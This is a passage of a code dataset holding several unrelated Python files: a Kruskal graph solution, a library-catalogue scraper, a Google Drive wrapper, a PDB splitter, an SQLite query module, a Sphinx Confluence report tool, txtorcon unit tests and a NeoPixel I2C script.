dist\n parent = [i for i in range(V + 1)]\n ranks = [0 for i in range(V + 1)]\n\n\ndef find_set(u):\n if parent[u] != u:\n parent[u] = find_set(parent[u])\n return parent[u]\n\n\ndef union_set(u, v):\n up = find_set(u)\n vp = find_set(v)\n if up == vp:\n return\n if ranks[up] > ranks[vp]:\n parent[vp] = up\n elif ranks[up] < ranks[vp]:\n parent[up] = vp\n else:\n parent[up] = vp\n ranks[vp] += 1\n\n\ndef kruskal(number_of_cities):\n graph.sort(key=lambda _edge: (_edge.weight, _edge.source))\n i = 0\n while len(dist) != number_of_cities - 1:\n edge = graph[i]\n i += 1\n u = find_set(edge.source)\n v = find_set(edge.target)\n if u != v:\n dist.append(edge)\n union_set(u, v)\n\n\ndef print_MST():\n ans = 0\n for e in dist:\n source = chr(e.source + 65)\n target = chr(e.target + 65)\n print(\"{0}-{1} {2}\".format(source, target, e.weight))\n ans += e.weight\n\n\ndef solution():\n\n number_of_test_cases = int(input())\n\n for t in range(number_of_test_cases):\n global graph, dist\n graph = []\n dist = []\n number_of_cities = int(input())\n for i in range(number_of_cities):\n securities = input().split(', ')\n for j in range(i):\n security = int(securities[j])\n if security > 0:\n graph.append(Triad(j, i, security))\n make_set(number_of_cities)\n kruskal(number_of_cities)\n 
print('Case {0}:'.format(t + 1))\n print_MST()\n\n\nsolution()\n","sub_path":"Blue/Session 19 - Kruskal/UVA_1208.py","file_name":"UVA_1208.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"650088593","text":"import subprocess\nfrom contextlib import contextmanager\n\n@contextmanager\ndef jep_pipe(argv):\n \"\"\"\n Launches a separate process to run a test. This can be called from a\n unittest method.\n \n Primary use cases:\n 1. Testing that the JVM does not crash when interpreting specific\n Python statements. We do not want to crash the current jep process\n that is running the unit tests.\n 2. Testing launching a Java main() process that sets up its own\n Jep instance for testing specific behavior.\n \n This will return the stdout of the separate process. Therefore the\n separate process should print out expected output. When asserting the\n output equals what is expected, the assert will need a trailing \\n.\n\n Args:\n argv: a list of command line arguments to launch the process,\n i.e. subprocess.Popen(argv)\n example: ['jep', 'tests/some_python_file.py']\n\n Returns:\n the stdout of the process\n \"\"\"\n\n try:\n p = subprocess.Popen(argv, stdout=subprocess.PIPE)\n yield(line.decode('utf-8') for line in p.stdout)\n finally:\n p.kill()\n","sub_path":"tests/jep_pipe.py","file_name":"jep_pipe.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"472088231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on Mon Mar 12 21:03:12 2018\n\n@author: Mingren Shen\n\nThis python program get data of all \"Data Science\" books form libraray of UIUC\n\n\n\"\"\"\n\n#import needed package\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\nimport requests\n#import pickle\n\ndef collectBookURL(webpage,result_dict):\n for a in webpage.findAll(\"a\", {\"class\": \"title\"}):\n # key is URL and content is title\n # in case Book with same title\n result_dict[a['href']] = a.get_text().replace('/',\"\")\n \ndef parseBookDetailPage(pageURL,pandasDF,rowIndex):\n tmp_r = requests.get(pageURL)\n tmp_soup = bs(tmp_r.text,\"lxml\")\n tableList = tmp_soup.find_all('table')\n #print(len(tableList))\n Info_table = tableList[2]\n ISBN_table = tableList[3]\n InfoSummary = dictify(Info_table)\n # Processing general Infomation Table\n for key,val in InfoSummary.items():\n if ( key in pandasDF.columns):\n pandasDF.at[rowIndex, key]= val\n else:\n print(\"===Error Uncaught record field in Table 1: \" + key)\n pandasDF.at[rowIndex, key]= val\n # Processing ISBN Table\n ISBNSummary = dictify(ISBN_table)\n for key,val in ISBNSummary.items():\n if ( key in pandasDF.columns):\n pandasDF.at[rowIndex, key]= val\n else:\n print(\"===Error Uncaught record field in Table 2 : \" + key)\n pandasDF.at[rowIndex, key]= val\n\n\n# dictify all the elements of HTML Table\ndef dictify(tableHTML):\n result_dict = dict()\n for table_rows in tableHTML.select(\"tr\"):\n content = table_rows.text.split(':')\n result_dict[content[0].strip()] = content[1].strip()\n return result_dict\n\n \n\nif __name__ == \"__main__\":\n \"\"\"\n method description :\n 1.get the search result from UW-Madison's library\n 2.get basic data\n 3.collect all URL for the books\n\n \"\"\"\n print(\"================The Start=========================\")\n\n # 20 Books per page, so 500 pages give 10000 Books.\n #print(\"We only need first 10000 
Books in the searching results.\")\n # dictory to store URL for the details pages of Book\n dict_BookDetailsURL = dict()\n # Rotate to get all URL of Books\n preURL = 'https://vufind.carli.illinois.edu/vf-uiu/Search/Home?type%5B%5D=&lookfor%5B%5D=Data%20Science&bool%5B%5D=AND&type%5B%5D=title&lookfor%5B%5D=&bool%5B%5D=AND&type%5B%5D=author&lookfor%5B%5D=&start_over=1&specDate=&version=any&gPub=&page='\n #postURL = '&q=Data+Science'\n # 10 Books per page, so 1000 pages give 10000 Books.\n print(\"We only need first 10000 Books in the searching results.\")\n MAX_PAGES = 501\n for i in range(1,MAX_PAGES):\n if ( i % 50 == 0):\n print(\"Processing Page \" + str(i))\n tmp_URL = preURL + str(i)\n tmp_r = requests.get(tmp_URL)\n tmp_soup = bs(tmp_r.text,\"lxml\")\n collectBookURL(tmp_soup,dict_BookDetailsURL)\n\n # set up DataFrame to store the data\n df = pd.DataFrame(columns=['ID','TITLE','Author','Other Names','Published','Topics','Genres','Tags','ISBN'])\n \n # Processing the detailed page of each book\n keyID = 0\n for key,value in dict_BookDetailsURL.items():\n itemURL = 'https://vufind.carli.illinois.edu' + key + '/Description'\n parseBookDetailPage(itemURL,df,keyID)\n df.at[keyID,'ID'] = keyID\n df.at[keyID,'TITLE'] = value\n if (keyID % 500 == 0):\n print (\"Now processing Book \" + str(keyID))\n keyID = keyID + 1\n #print(itemURL)\n df.to_csv(\"BOOKS_UIUC.csv\",sep = '\\t',index = False, encoding='utf-8')\n print(\"================The End===========================\")\n ","sub_path":"stage2/code/webcrawl_UIUC.py","file_name":"webcrawl_UIUC.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"66376063","text":"import warnings\nfrom typing import Optional, Union\n\nfrom pygsuite import Clients\nfrom pygsuite.drive.folder import Folder\nfrom pygsuite.drive.query import Operator, QueryString, QueryStringGroup, QueryTerm\nfrom pygsuite.enums import MimeType\n\n\nDRIVE_V3_API_URL = \"https://www.googleapis.com/drive/v3/files\"\n\n\ndef default_callback(request_id, response, exception):\n if exception:\n # Handle error\n raise ValueError(exception)\n\n\nclass Drive:\n \"\"\"Due for deprecation, please use File and Folder to search and create objects.\"\"\"\n\n def __init__(self, client=None):\n client = client or Clients.drive_client_v3\n self.service = client\n\n # warn users about deprecation\n warnings.warn((\n \"This object and its methods will be deprecated soon.\"\n \"Please consider using a drive.File or drive.Folder object instead\"\n ), DeprecationWarning)\n\n def _find_files(self, type: MimeType, name: Optional[str] = None):\n q = f'mimeType=\"{type}\"'\n if name:\n q += f' and name = \"{name}\"'\n base = self.service.files().list(q=q).execute()\n files = base.get(\"files\")\n page_token = base.get(\"nextPageToken\")\n while page_token is not None:\n base = self.service.files().list(q=q, page_token=page_token).execute()\n files += base.get(\"files\")\n page_token = base.get(\"nextPageToken\")\n return files\n\n def find_files(\n self,\n folder_id: Optional[str] = None,\n name: Optional[str] = None,\n exact_match: bool = True,\n type: Optional[Union[MimeType, str]] = None,\n extra_conditions: Optional[Union[QueryString, QueryStringGroup]] = None,\n support_all_drives: bool = False,\n ):\n \"\"\"Find matching files given certain criteria.\n\n Args:\n folder_id (str): The folder ID to search within. 
If none is provided, a recursive search of all folders is performed.\n name (str): The case-sensitive name of the file to search for.\n exact_match (bool): Whether to only match the given name exactly, or return any name containing the string.\n type (Union[MimeType, str]): A specific Google Docs type to match.\n extra_conditions (Union[QueryString, QueryStringGroup]): Any additional queries to pass to the files search.\n support_all_drives (bool): Whether the requesting application supports both My Drives and shared drives.\n \"\"\"\n query = None\n\n # name match query\n if name:\n operator = Operator.EQUAL if exact_match else Operator.CONTAINS\n name_query = QueryString(QueryTerm.NAME, operator, name)\n query = name_query\n\n # optional type query\n if type:\n mimetype = str(type) if isinstance(type, MimeType) else type\n type_query = QueryString(QueryTerm.MIMETYPE, Operator.EQUAL, mimetype)\n query = QueryStringGroup([query, type_query]) if query else type_query\n\n # optional auxillary query\n if extra_conditions:\n query = QueryStringGroup([query, extra_conditions]) if query else extra_conditions\n\n folder = Folder(id=folder_id, client=self.service)\n files = folder.get_files(extra_conditions=query, support_all_drives=support_all_drives)\n\n return files\n\n def copy_file(self, file_id, title: str, folder_id: str):\n body = {\"name\": title, \"parents\": [folder_id]}\n response = self.service.files().copy(fileId=file_id, body=body).execute()\n return response\n","sub_path":"pygsuite/drive/drive.py","file_name":"drive.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"216041112","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 16 09:36:57 2020\r\n\r\nThis script splits a .pdb file containing many structures, giving each structure its own .pdb file. 
Only alpha carbons are carried over.\r\n\r\n@author: Victor Prieto\r\n\r\n\"\"\"\r\n\r\n''# -*- coding: utf-8 -*-\r\n\r\n\r\n#starts program runtime\r\nimport time\r\nstart_time = time.time()\r\n\r\nimport tkinter\r\nroot = tkinter.Tk()\r\nroot.withdraw()\r\n\r\n#create list of filenames\r\nfilename_list = []\r\n\r\nfor i in range(1, 20):\r\n filename = 'N_' + \"{:03d}\".format(i) + '_campari_traj.pdb'\r\n filename_list.append(filename)\r\n \r\n#Place the file requested into an array.\r\nfile = open('N_001_campari_traj.pdb')\r\n\r\nmodel = []\r\n\r\ncount = 0\r\n\r\nfor filename in filename_list:\r\n file = open(filename)\r\n for line in file:\r\n if line.startswith('CRYST'):\r\n count += 1\r\n if count % 100 == 0:\r\n print ('\\nnumber of processed models: ', str(count), '\\n') \r\n count_string = str(count)\r\n output_file_name = filename[3:6] + count_string.zfill(6) + '.pdb'\r\n output_file = open(output_file_name, 'w')\r\n output_file.write(line)\r\n if line.startswith('TITLE'):\r\n output_file.write(line)\r\n if line.startswith('MODEL'):\r\n output_file.write(line)\r\n if line.startswith('ATOM') and line[13:15] == 'CA':\r\n output_file.write(line)\r\n if line.startswith('ENDMDL'):\r\n output_file.write('ENDMDL\\n')\r\n output_file.close()\r\n if count == 10000:\r\n break\r\n else:\r\n None\r\n\r\n#prints runtime\r\nprint(\"--- %s seconds ---\" % (time.time() - start_time)) ","sub_path":"trajectory_training_set/PDB splitter alpha carbon master.py","file_name":"PDB splitter alpha carbon master.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"595046533","text":"# Testing for python database server\r\n#\r\n# This file wil eventually contain all functions relating to accessing the DB\r\n# This makes it easier to test offline without working on the server at all times\r\n#\r\n# Current Functions:\r\n#\r\n# create_connection(db) - Creates connection to SQLlite3 database stored in the same folder\r\n#\r\n# Version 1.1 by Nathan Graves\r\n\r\nimport sqlite3 as sql\r\nimport cgi\r\nimport sys\r\nimport json\r\n\r\n#\r\n# BASIC SETUP FUNCTIONS\r\n#\r\n\r\ndef JS_Intake():\r\n\r\n\r\n return \"result\"\r\n#end JS_Intake\r\n\r\n\r\ndef DB_NAME(): #Clean? no, but it works. 
Allows for easy modification of accessed DB\r\n return \"FooDBv3.db3\"\r\n#end DB_NAME()\r\n\r\ndef create_connection(db):\r\n\r\n \"\"\"Creates a connection to the specified database\r\n Returns conn, a connection object, or nothing if connection fails\r\n \"\"\"\r\n\r\n try:\r\n conn = sql.connect(db)\r\n return conn\r\n print(sql.version)\r\n except Error as e:\r\n print(e)\r\n\r\n return\r\n#end create_connection\r\n\r\n#\r\n# BASIC QUERYING FUNCTIONS\r\n#\r\n\r\ndef exactMatch(item):\r\n \"\"\"Function queries database for an exact match of the item and returns all data\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #make statement string\r\n sqlStatement = \"SELECT * FROM parsedFood WHERE searchString=?\";\r\n\r\n #execute query\r\n cur.execute(sqlStatement, (item,));\r\n match = cur.fetchall()\r\n\r\n #close connection and return result\r\n conn.close();\r\n return match\r\n#end exactMatch()\r\n\r\ndef customQuery(queryString):\r\n \"\"\" Function submits custom query to databse and returns whatever results from that\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #execute query\r\n cur.execute(queryString);\r\n queryResult = cur.fetchall();\r\n\r\n #close connection and return result\r\n conn.close();\r\n return queryResult\r\n#end customQuery\r\n\r\ndef fdcIDbasicSearch(id):\r\n \"\"\" Function submits a search to the database based on FDC_ID, an integer\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #create SQL Statement\r\n sqlStatement = \"SELECT * FROM parsedFood WHERE fdcID=?\";\r\n\r\n #execute query\r\n cur.execute(sqlStatement,(id,));\r\n idSearchResult = cur.fetchall();\r\n\r\n #close connection and return result\r\n conn.close();\r\n return idSearchResult\r\n#end fdcIDbasicSearch\r\n\r\ndef fdcIDnutritionSearch(id):\r\n \"\"\" Function submits a search to the database based on FDC_ID, an integer\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #create SQL Statement\r\n sqlStatement = '''SELECT * FROM nutValues WHERE FDC_ID=? \r\n\t\t UNION\r\n\t\t SELECT * FROM nutUnits WHERE FDC_ID=?''';\r\n\r\n #execute query\r\n cur.execute(sqlStatement,(id,id));\r\n idSearchResult = cur.fetchall();\r\n\r\n #close connection and return result\r\n conn.close();\r\n return idSearchResult\r\n#end fdcIDnutritionSearch\r\n\r\n#\r\n# SPECIALIZED QUERYING FUNCTIONS\r\n#\r\n\r\ndef closeMatch(searchString):\r\n \"\"\" Function submits a search to the database based on searchString\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #create SQL Statement\r\n sqlStatement = \"\"\"SELECT foodDescription,fdcID FROM parsedFood WHERE searchString LIKE ?\r\n ORDER BY (CASE WHEN searchString = ? THEN 1 WHEN searchString LIKE ? 
THEN 2 ELSE 3 END)\r\n \"\"\";\r\n\r\n #execute query\r\n cur.execute(sqlStatement,('%'+searchString+'%',searchString,searchString+'%'));\r\n table = cur.fetchmany(50);\r\n\r\n #close connection and return result\r\n conn.close();\r\n return table\r\n#end closeMatch\r\n\r\ndef rand3():\r\n \"\"\" Selects Three Random Rows\"\"\"\r\n #create connection and cursor\r\n conn = create_connection(DB_NAME());\r\n cur = conn.cursor();\r\n\r\n #create SQL Statement\r\n sqlStatement = \"SELECT foodDescription,fdcID FROM parsedFood ORDER BY random() LIMIT 3\";\r\n\r\n #execute query\r\n cur.execute(sqlStatement);\r\n table = cur.fetchall();\r\n\r\n #close connection and return result\r\n conn.close();\r\n return table\r\n#end rand3\r\n\r\n#end PythonTest\r\n","sub_path":"html/cgi-bin/FooDB.py","file_name":"FooDB.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"625572226","text":"# -*- coding: utf-8 -*-\n\"\"\"\n:copyright: Copyright 2020 Sphinx Confluence Builder Contributors (AUTHORS)\n:license: BSD-2-Clause (LICENSE)\n\"\"\"\n\nfrom collections import OrderedDict\nfrom requests import __version__ as requests_version\nfrom sphinx import __version__ as sphinx_version\nfrom sphinx.application import Sphinx\nfrom sphinx.util.docutils import docutils_namespace\nfrom sphinxcontrib.confluencebuilder import __version__ as scb_version\nfrom sphinxcontrib.confluencebuilder.config import process_ask_configs\nfrom sphinxcontrib.confluencebuilder.logger import ConfluenceLogger as logger\nfrom sphinxcontrib.confluencebuilder.publisher import ConfluencePublisher\nfrom sphinxcontrib.confluencebuilder.reportbuilder import ConfluenceReportBuilder\nfrom sphinxcontrib.confluencebuilder.util import ConfluenceUtil\nfrom tempfile import TemporaryDirectory\nfrom xml.etree import ElementTree\nimport os\nimport platform\nimport sys\n\ntry:\n from urllib.parse import urlparse\nexcept NameError:\n from urlparse import urlparse\n\n#: rest point to fetch instance manifest state\nMANIFEST_PATH = 'rest/applinks/1.0/manifest'\n\n#: prefixes for builder-specific configurations to always be sanitized\nIGNORE_BUILDER_CONFS = (\n 'applehelp_',\n 'devhelp_',\n 'epub_',\n 'html_',\n 'htmlhelp_',\n 'latex_',\n 'man_',\n 'qthelp_',\n 'texinfo_',\n 'text_',\n 'xml_',\n)\n\ndef report_main(args_parser):\n \"\"\"\n report mainline\n\n The mainline for the 'report' action.\n\n Args:\n args_parser: the argument parser to use for argument processing\n\n Returns:\n the exit code\n \"\"\"\n\n args_parser.add_argument('--full-config', '-C', action='store_true')\n args_parser.add_argument('--no-sanitize', action='store_true')\n args_parser.add_argument('--offline', action='store_true')\n\n known_args = sys.argv[1:]\n args, unknown_args = args_parser.parse_known_args(known_args)\n if unknown_args:\n logger.warn('unknown arguments: {}'.format(' '.join(unknown_args)))\n\n rv = 0\n work_dir = args.work_dir if args.work_dir else os.getcwd()\n\n # setup sphinx engine to extract configuration\n config = {}\n configuration_load_issue = None\n confluence_instance_info = None\n publisher = ConfluencePublisher()\n\n try:\n with TemporaryDirectory() as tmp_dir:\n with docutils_namespace():\n print('fetching configuration information...')\n app = Sphinx(\n work_dir, # document sources\n work_dir, # directory with configuration\n tmp_dir, # output for built documents\n tmp_dir, # output for doctree files\n ConfluenceReportBuilder.name) # builder to execute\n\n if 
app.config.confluence_publish:\n process_ask_configs(app.config)\n\n # extract configuration information\n for k, v in app.config.values.items():\n raw = getattr(app.config, k)\n if raw is None:\n continue\n\n if callable(raw):\n value = '(callable)'\n else:\n value = raw\n\n if not args.full_config and not k.startswith('confluence_'):\n continue\n\n # always extract some known builder configurations\n if args.full_config and k.startswith(IGNORE_BUILDER_CONFS):\n continue\n\n config[k] = value\n\n # initialize the publisher (if needed later)\n publisher.init(app.config)\n\n except Exception as ex:\n logger.error(ex)\n if os.path.isfile(os.path.join(work_dir, 'conf.py')):\n configuration_load_issue = 'unable to load configuration'\n else:\n configuration_load_issue = 'no documentation/missing configuration'\n rv = 1\n\n # attempt to fetch confluence instance version\n confluence_publish = config.get('confluence_publish')\n confluence_server_url = config.get('confluence_server_url')\n if not args.offline and confluence_publish and confluence_server_url:\n base_url = ConfluenceUtil.normalizeBaseUrl(confluence_server_url)\n info = ''\n\n session = None\n try:\n print('connecting to confluence instance...')\n publisher.connect()\n info += ' connected: yes\\n'\n session = publisher.rest_client.session\n except Exception as ex:\n logger.error(ex)\n info += ' connected: no\\n'\n rv = 1\n\n if session:\n try:\n # fetch\n print('fetching confluence instance information...')\n manifest_url = base_url + MANIFEST_PATH\n rsp = session.get(manifest_url)\n\n if rsp.status_code == 200:\n info += ' fetched: yes\\n'\n\n # extract\n print('decoding information...')\n rsp.encoding = 'utf-8'\n raw_data = rsp.text\n info += ' decoded: yes\\n'\n\n # parse\n print('parsing information...')\n xml_data = ElementTree.fromstring(raw_data)\n info += ' parsed: yes\\n'\n root = ElementTree.ElementTree(xml_data)\n for o in root.findall('typeId'):\n info += ' type: ' + o.text + '\\n'\n for o in root.findall('version'):\n info += ' version: ' + o.text + '\\n'\n for o in root.findall('buildNumber'):\n info += ' build: ' + o.text + '\\n'\n else:\n logger.error('bad response from server ({})'.format(\n rsp.status_code))\n info += ' fetched: error ({})\\n'.format(rsp.status_code)\n rv = 1\n except Exception as ex:\n logger.error(ex)\n info += 'failure to determine confluence data\\n'\n rv = 1\n\n confluence_instance_info = info\n\n def sensitive_config(key):\n if key in config:\n config[key] = '(set)'\n\n # always sanitize out sensitive information\n sensitive_config('confluence_client_cert_pass')\n sensitive_config('confluence_server_pass')\n\n # optional sanitization\n if not args.no_sanitize:\n sensitive_config('author')\n sensitive_config('confluence_client_cert')\n sensitive_config('confluence_global_labels')\n sensitive_config('confluence_jira_servers')\n sensitive_config('confluence_parent_page')\n sensitive_config('confluence_parent_page_id_check')\n sensitive_config('confluence_proxy')\n sensitive_config('confluence_server_auth')\n sensitive_config('confluence_server_cookies')\n sensitive_config('confluence_server_user')\n sensitive_config('project')\n\n # remove confluence instance (attempt to keep scheme)\n if 'confluence_server_url' in config:\n value = config['confluence_server_url']\n parsed = urlparse(value)\n\n if parsed.scheme:\n value = parsed.scheme + '://'\n else:\n value = '(set; no scheme)'\n\n if parsed.netloc and parsed.netloc.endswith('atlassian.net'):\n value += ' (cloud)'\n\n 
config['confluence_server_url'] = value\n\n # remove space name, but track casing\n if 'confluence_space_name' in config:\n value = config['confluence_space_name']\n if value.isupper():\n value = '(set; upper)'\n elif value.islower():\n value = '(set; upper)'\n else:\n value = '(set; mixed)'\n config['confluence_space_name'] = value\n\n print('')\n print('Confluence builder report has been generated.')\n print('Please copy the following text for the GitHub issue:')\n print('')\n logger.note('------------[ cut here ]------------')\n print('(system)')\n print(' platform:', single_line_version(platform.platform()))\n print(' python:', single_line_version(sys.version))\n print(' sphinx:', single_line_version(sphinx_version))\n print(' requests:', single_line_version(requests_version))\n print(' builder:', single_line_version(scb_version))\n\n print('')\n print('(configuration)')\n if config:\n for k, v in OrderedDict(sorted(config.items())).items():\n print('{}: {}'.format(k, v))\n else:\n print('~default configuration~')\n\n if configuration_load_issue:\n print('')\n print('(error loading configuration)')\n print(configuration_load_issue)\n\n if confluence_instance_info:\n print('')\n print('(confluence instance)')\n print(confluence_instance_info.rstrip())\n\n logger.note('------------[ cut here ]------------')\n\n return rv\n\ndef single_line_version(value):\n \"\"\"\n ensure a version value is represented in a single string\n\n When processing version entries, the output may attempt to print out\n multiple lines. This call helps join the multiple lines together.\n\n Args:\n value: the value to extract a version from\n\n Returns:\n the single-line version string\n \"\"\"\n return ' '.join(str(value).split())\n","sub_path":"sphinxcontrib/confluencebuilder/cmd/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":9554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"590972420","text":"from mock import patch\nfrom twisted.trial import unittest\nfrom twisted.internet import defer\nfrom twisted.internet.endpoints import TCP4ServerEndpoint\nfrom twisted.internet.interfaces import IProtocolFactory\nfrom zope.interface import implements\n\nfrom txtorcon.util import process_from_address, delete_file_or_tree, find_keywords, ip_from_int, find_tor_binary, maybe_ip_addr\n\nimport os\nimport tempfile\n\n\nclass FakeState:\n tor_pid = 0\n\n\nclass FakeProtocolFactory:\n implements(IProtocolFactory)\n\n def doStart(self):\n \"IProtocolFactory API\"\n\n def doStop(self):\n \"IProtocolFactory API\"\n\n def buildProtocol(self, addr):\n \"IProtocolFactory API\"\n return None\n\n\nclass TestIPFromInt(unittest.TestCase):\n\n def test_cast(self):\n self.assertEqual(ip_from_int(0x7f000001), '127.0.0.1')\n\n\nclass TestGeoIpDatabaseLoading(unittest.TestCase):\n\n def test_bad_geoip_path(self):\n \"fail gracefully if a db is missing\"\n from txtorcon import util\n self.assertRaises(IOError, util.create_geoip, '_missing_path_')\n\n\nclass TestFindKeywords(unittest.TestCase):\n\n def test_filter(self):\n \"make sure we filter out keys that look like router IDs\"\n self.assertEqual(find_keywords(\"foo=bar $1234567890=routername baz=quux\".split()),\n {'foo': 'bar', 'baz': 'quux'})\n\n\nclass FakeGeoIP(object):\n def __init__(self, version=2):\n self.version = version\n\n def record_by_addr(self, ip):\n r = dict(country_code='XX',\n latitude=50.0,\n longitude=0.0,\n city='City')\n if self.version == 2:\n r['region_code'] = 'Region'\n else:\n 
r['region_name'] = 'Region'\n return r\n\n\nclass TestNetLocation(unittest.TestCase):\n\n def test_valid_lookup_v2(self):\n from txtorcon import util\n orig = util.city\n try:\n util.city = FakeGeoIP(version=2)\n nl = util.NetLocation('127.0.0.1')\n self.assertTrue(nl.city)\n self.assertEquals(nl.city[0], 'City')\n self.assertEquals(nl.city[1], 'Region')\n finally:\n util.ity = orig\n\n def test_valid_lookup_v3(self):\n from txtorcon import util\n orig = util.city\n try:\n util.city = FakeGeoIP(version=3)\n nl = util.NetLocation('127.0.0.1')\n self.assertTrue(nl.city)\n self.assertEquals(nl.city[0], 'City')\n self.assertEquals(nl.city[1], 'Region')\n finally:\n util.ity = orig\n\n def test_city_fails(self):\n \"make sure we don't fail if the city lookup excepts\"\n from txtorcon import util\n orig = util.city\n try:\n class Thrower(object):\n def record_by_addr(*args, **kw):\n raise RuntimeError(\"testing failure\")\n util.city = Thrower()\n nl = util.NetLocation('127.0.0.1')\n self.assertEqual(None, nl.city)\n\n finally:\n util.city = orig\n\n def test_no_city_db(self):\n \"ensure we lookup from country if we have no city\"\n from txtorcon import util\n origcity = util.city\n origcountry = util.country\n try:\n util.city = None\n obj = object()\n\n class CountryCoder(object):\n def country_code_by_addr(self, ipaddr):\n return obj\n util.country = CountryCoder()\n nl = util.NetLocation('127.0.0.1')\n self.assertEqual(obj, nl.countrycode)\n\n finally:\n util.city = origcity\n util.country = origcountry\n\n def test_no_city_or_country_db(self):\n \"ensure we lookup from asn if we have no city or country\"\n from txtorcon import util\n origcity = util.city\n origcountry = util.country\n origasn = util.asn\n try:\n util.city = None\n util.country = None\n\n class Thrower:\n def org_by_addr(*args, **kw):\n raise RuntimeError(\"testing failure\")\n util.asn = Thrower()\n nl = util.NetLocation('127.0.0.1')\n self.assertEqual('', nl.countrycode)\n\n finally:\n util.city = origcity\n util.country = origcountry\n util.asn = origasn\n\n\nclass TestProcessFromUtil(unittest.TestCase):\n\n def setUp(self):\n self.fakestate = FakeState()\n\n def test_none(self):\n \"ensure we do something useful on a None address\"\n self.assertEqual(process_from_address(None, 80, self.fakestate), None)\n\n def test_internal(self):\n \"look up the (Tor_internal) PID\"\n pfa = process_from_address('(Tor_internal)', 80, self.fakestate)\n # depends on whether you have psutil installed or not, and on\n # whether your system always has a PID 0 process...\n self.assertEqual(pfa, self.fakestate.tor_pid)\n\n def test_internal_no_state(self):\n \"look up the (Tor_internal) PID\"\n pfa = process_from_address('(Tor_internal)', 80)\n # depends on whether you have psutil installed or not, and on\n # whether your system always has a PID 0 process...\n self.assertEqual(pfa, None)\n\n @defer.inlineCallbacks\n def test_real_addr(self):\n ## FIXME should choose a port which definitely isn't used.\n\n ## it's apparently frowned upon to use the \"real\" reactor in\n ## tests, but I was using \"nc\" before, and I think this is\n ## preferable.\n from twisted.internet import reactor\n listener = yield TCP4ServerEndpoint(reactor, 9887).listen(FakeProtocolFactory())\n\n try:\n pid = process_from_address('0.0.0.0', 9887, self.fakestate)\n finally:\n listener.stopListening()\n\n self.assertEqual(pid, os.getpid())\n\n\nclass TestDelete(unittest.TestCase):\n\n def test_delete_file(self):\n (fd, f) = tempfile.mkstemp()\n os.write(fd, 
'some\\ndata\\n')\n os.close(fd)\n self.assertTrue(os.path.exists(f))\n delete_file_or_tree(f)\n self.assertTrue(not os.path.exists(f))\n\n def test_delete_tree(self):\n d = tempfile.mkdtemp()\n f = open(os.path.join(d, 'foo'), 'w')\n f.write('foo\\n')\n f.close()\n\n self.assertTrue(os.path.exists(d))\n self.assertTrue(os.path.isdir(d))\n self.assertTrue(os.path.exists(os.path.join(d, 'foo')))\n\n delete_file_or_tree(d)\n\n self.assertTrue(not os.path.exists(d))\n self.assertTrue(not os.path.exists(os.path.join(d, 'foo')))\n\n\nclass TestFindTor(unittest.TestCase):\n\n def test_simple_find_tor(self):\n ## just test that this doesn't raise an exception\n find_tor_binary()\n\n def test_find_tor_globs(self):\n \"test searching by globs\"\n find_tor_binary(system_tor=False)\n\n def test_find_tor_unfound(self):\n \"test searching by globs\"\n self.assertEqual(None, find_tor_binary(system_tor=False, globs=()))\n\n @patch('txtorcon.util.subprocess.Popen')\n def test_find_ioerror(self, popen):\n \"test searching with which, but it fails\"\n popen.side_effect = OSError\n self.assertEqual(None, find_tor_binary(system_tor=True, globs=()))\n\n\nclass TestIpAddr(unittest.TestCase):\n\n @patch('txtorcon.util.ipaddr')\n def test_create_ipaddr(self, ipaddr):\n ip = maybe_ip_addr('1.2.3.4')\n\n @patch('txtorcon.util.ipaddr')\n def test_create_ipaddr(self, ipaddr):\n def foo(blam):\n raise ValueError('testing')\n ipaddr.IPAddress.side_effect = foo\n ip = maybe_ip_addr('1.2.3.4')\n","sub_path":"test/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":7636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"518248963","text":"#!/usr/bin/env python\n\nimport smbus\nimport time\n\n# Set the bus as I2C bus 0\nbus = smbus.SMBus(0)\n\n# This is the address we setup in the Arduino Sketch\naddress = 0x0a\n\ndef setPixel(x, y, r, g, b):\n bus.write_block_data(address, 0, [x, y, r, g, b]);\n\nwhile True:\n x = int(input('X-Coordinate: '))\n y = int(input('Y-Coordinate: '))\n r = int(input('Red: '))\n g = int(input('Green: '))\n b = int(input('Blue: '))\n setPixel(x, y, r, g, b)\n print\n","sub_path":"neopixel/omega.py","file_name":"omega.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"165177061","text":"\"\"\"\"\"\na = 10\nb = 25\nc = 66\n\nx = int(input(\"Digite um número: \"))\n\nif(x == a) or (x == b) or (x == c):\n print(\"Está contido\")\nelse:\n print(\"Não está contido\")\n\nprint(\"===utilizando Operadores IN\")\n\nr = 10\ny = 25\nt = 